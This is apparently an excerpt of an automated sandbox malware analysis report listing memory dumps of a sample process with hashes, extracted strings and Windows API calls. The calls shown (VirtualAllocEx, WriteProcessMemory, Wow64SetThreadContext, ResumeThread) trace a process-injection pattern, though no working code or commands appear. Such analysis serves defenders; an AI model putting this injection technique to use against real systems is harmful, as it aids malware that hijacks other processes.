                                                            • Instruction Fuzzy Hash: 95519C78E49248DFCB04CFA8D460AAEBBF1EF4A310F1580ABE515AB351C7349845CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 670d38e3dacd46167465af400e36d3c369aa55ebcd374f698cc5b8a107be2d88
                                                            • Instruction ID: 92643c38e46131f0cc3835f6702d8bf670fe0b50782570a649baa70622e318ca
                                                            • Opcode Fuzzy Hash: 670d38e3dacd46167465af400e36d3c369aa55ebcd374f698cc5b8a107be2d88
                                                            • Instruction Fuzzy Hash: B462BB34B047119FCB25CF68C4A06AEFBF2BF89304F148929D55A9B780DB74E906CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c1525d940c86d0d7aa8e8d1929ba2000a68618db17ddc10254e61232005763b6
                                                            • Instruction ID: 1fc7260ba53e57bb2d2e741d31b575cdd45cf2e563bef0c0c3bb05501904ab05
                                                            • Opcode Fuzzy Hash: c1525d940c86d0d7aa8e8d1929ba2000a68618db17ddc10254e61232005763b6
                                                            • Instruction Fuzzy Hash: 60424934B402088FDB14EF39C994A6A77F6AF89344B5684A9D906CB3A5DF31EC42CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 32f4cb2fd3c31ac221670aefa0600de3f8741f4c30336072768b46b3f83281da
                                                            • Instruction ID: 41f2835b4f95c7f14dcc8b2880c8e4e8e3c471841a6591fd9e69eefb1a9c0ead
                                                            • Opcode Fuzzy Hash: 32f4cb2fd3c31ac221670aefa0600de3f8741f4c30336072768b46b3f83281da
                                                            • Instruction Fuzzy Hash: 41226C35A402149FDB14EF64D894AAEB7F2AF88304F158069E905DB3A1DB71ED82CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.619777746.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_3d0000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 00bf84001a22a7db93764c36e5d3673bdb4edc451b9d82dc9ea72fe7ff549f32
                                                            • Instruction ID: 4a5f41eb98df1f9f081ca88ee7fca0680f5bcc03ef638fd17485dcff89eefa16
                                                            • Opcode Fuzzy Hash: 00bf84001a22a7db93764c36e5d3673bdb4edc451b9d82dc9ea72fe7ff549f32
                                                            • Instruction Fuzzy Hash: FEF1E37594A228CFDB22CF14E898BEAB7B5BB6A301F2090D6D409A7751D7709EC1DF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4eb0e7fb1f6169de4c64d6749b16c4c75d6bab245930d94a00ddf37401c7272c
                                                            • Instruction ID: 83707f8dea7affdb94d8740c84ebcc366aa81899530f72705b7cf3639787a2b4
                                                            • Opcode Fuzzy Hash: 4eb0e7fb1f6169de4c64d6749b16c4c75d6bab245930d94a00ddf37401c7272c
                                                            • Instruction Fuzzy Hash: 3A918E31B241248BC714DB6AD840AAEB3B3AFC4754F5AC065E806EB759DF759C46CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 07f2172e927f0498c2a149a32e8bff16ed81991e7ac837ddd19a1dd927d4ff61
                                                            • Instruction ID: fd4a49e5f9b36203b19972e7d021384b7014c1d69662a37d27090bb9d5eef327
                                                            • Opcode Fuzzy Hash: 07f2172e927f0498c2a149a32e8bff16ed81991e7ac837ddd19a1dd927d4ff61
                                                            • Instruction Fuzzy Hash: FF812A35A402188FCB14EF69C4849AEB7F6FF88714B1684A9E916DB361DB31ED41CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll$.@ll$Duo$Duo
                                                            • API String ID: 0-1451570219
                                                            • Opcode ID: 771d89266b88dfd0948c50093a7448e0fc5777850fbdd7eb8664002624205583
                                                            • Instruction ID: 599c595d763c3c8b00d30ee7047d8395554005f304e7a36f18a96d591c97ef7f
                                                            • Opcode Fuzzy Hash: 771d89266b88dfd0948c50093a7448e0fc5777850fbdd7eb8664002624205583
                                                            • Instruction Fuzzy Hash: C1A18035B18128AFCB11DFA8E8859FEFBB2FF88310B94856BE50A97355C7319845CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll$.@ll$Duo
                                                            • API String ID: 0-1677867494
                                                            • Opcode ID: 8e0916a58579e8c7c07afc8ae0a8014a033c1b564aaff2ec2cbf154462421f00
                                                            • Instruction ID: 9bb525e0e4a0d61389e9022378c24feaec552c500051bff05853c5ae6ee53ea8
                                                            • Opcode Fuzzy Hash: 8e0916a58579e8c7c07afc8ae0a8014a033c1b564aaff2ec2cbf154462421f00
                                                            • Instruction Fuzzy Hash: FF515E75A04124EFCB05CFA8D8858FDBBB3FF88310B94856AE416A7351DB30AC46CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ,zo$Duo$d|o
                                                            • API String ID: 0-910993238
                                                            • Opcode ID: b8941f81513ed49e95a16b6b62d4aa80779afda764bb1cdace9faaa553b6d7cb
                                                            • Instruction ID: 408fc10dd3c3d865093c9cd3ba4ce037b58cae32d3e5470677f6e89034e338ca
                                                            • Opcode Fuzzy Hash: b8941f81513ed49e95a16b6b62d4aa80779afda764bb1cdace9faaa553b6d7cb
                                                            • Instruction Fuzzy Hash: 7511933170C2246BD708BBB968946BEA697EFD4350B84843EF626CB394CF319D168761
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll$fCll
                                                            • API String ID: 0-2296306532
                                                            • Opcode ID: e54d9445f537c6c884073b996bf4bf7d1294db73b79c4a763067a86a0743b3b9
                                                            • Instruction ID: 380a066af9e671f14e3767d55479c32aff005b6792849cd0dfeecce6ce4a076c
                                                            • Opcode Fuzzy Hash: e54d9445f537c6c884073b996bf4bf7d1294db73b79c4a763067a86a0743b3b9
                                                            • Instruction Fuzzy Hash: C9D16F31A84214DFCB19DFA4E480AADB7B6BF89304F568479E41AAF355DB31EC41CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll$d
                                                            • API String ID: 0-1604166580
                                                            • Opcode ID: 1dad37e9baeb26ab21f8bb0df53c06d9b1a6e0af3c29cce430021a4d8b7dbf8e
                                                            • Instruction ID: ef06efd950265d49a321e52d7e0d56d10ee0160aad8df94bd089a32084a2cd38
                                                            • Opcode Fuzzy Hash: 1dad37e9baeb26ab21f8bb0df53c06d9b1a6e0af3c29cce430021a4d8b7dbf8e
                                                            • Instruction Fuzzy Hash: 0CD17E306406058FCB24DF28C4909AAB7F3FF89314B25856AD55A9B761DB31FC46CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: D~o$~o
                                                            • API String ID: 0-1942811931
                                                            • Opcode ID: 0481833f8dcdf54094e8a107ca26d3962a983e78e04da7ab7ced84647de451c2
                                                            • Instruction ID: d639df2159a8a952c4a83dceedaed2092eaf09742421cf50d81c14098f893829
                                                            • Opcode Fuzzy Hash: 0481833f8dcdf54094e8a107ca26d3962a983e78e04da7ab7ced84647de451c2
                                                            • Instruction Fuzzy Hash: E9B1CB30A04636DFC714CF69C4849BAB7F6FF48310B558AAAE41ACB761D731E852CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Lo$Lo
                                                            • API String ID: 0-464136729
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll$Duo
                                                            • API String ID: 0-967271190
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: |o$,{o
                                                            • API String ID: 0-982683869
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • K32EnumProcesses.KERNEL32(?,?,?), ref: 021AA610
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: EnumProcesses
                                                            • String ID:
                                                            • API String ID: 84517404-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 021A8FC7
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 021A8FC7
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: CreateProcess
                                                            • String ID:
                                                            • API String ID: 963392458-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 021AB59F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: BaseModuleName
                                                            • String ID:
                                                            • API String ID: 595626670-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • K32GetModuleBaseNameA.KERNEL32(?,?,?,?), ref: 021AB59F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: BaseModuleName
                                                            • String ID:
                                                            • API String ID: 595626670-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll
                                                            • API String ID: 0-3231272322
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • K32EnumProcesses.KERNEL32(?,?,?), ref: 021AA610
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: EnumProcesses
                                                            • String ID:
                                                            • API String ID: 84517404-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 021A8B7B
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 021A8B7B
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessWrite
                                                            • String ID:
                                                            • API String ID: 3559483778-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • K32EnumProcesses.KERNEL32(?,?,?), ref: 021AA610
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: EnumProcesses
                                                            • String ID:
                                                            • API String ID: 84517404-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 021A933A
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 021A933A
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: MemoryProcessRead
                                                            • String ID:
                                                            • API String ID: 1726664587-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 021A8A32
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 021A8A32
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 021AB3B6
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: EnumModulesProcess
                                                            • String ID:
                                                            • API String ID: 1082081703-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 021AB3B6
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: EnumModulesProcess
                                                            • String ID:
                                                            • API String ID: 1082081703-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 021A890F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 021A890F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.619777746.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_3d0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.619777746.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_3d0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll
                                                            • API String ID: 0-2625602313
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll
                                                            • API String ID: 0-3231272322
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll
                                                            • API String ID: 0-3231272322
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll
                                                            • API String ID: 0-3231272322
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ~o
                                                            • API String ID: 0-2881337155
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll
                                                            • API String ID: 0-3231272322
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2
                                                            • API String ID: 0-450215437
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: {o
                                                            • API String ID: 0-3603579654
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: {o
                                                            • API String ID: 0-3603579654
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll
                                                            • API String ID: 0-2625602313
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: {o
                                                            • API String ID: 0-3603579654
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll
                                                            • API String ID: 0-3231272322
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621229391.0000000002160000.00000040.00000010.sdmp, Offset: 02160000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2160000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3c0a699ae7b495a49f52e7b46d0a1aa96920a4a727b8214b5aeef20fe1f5449e
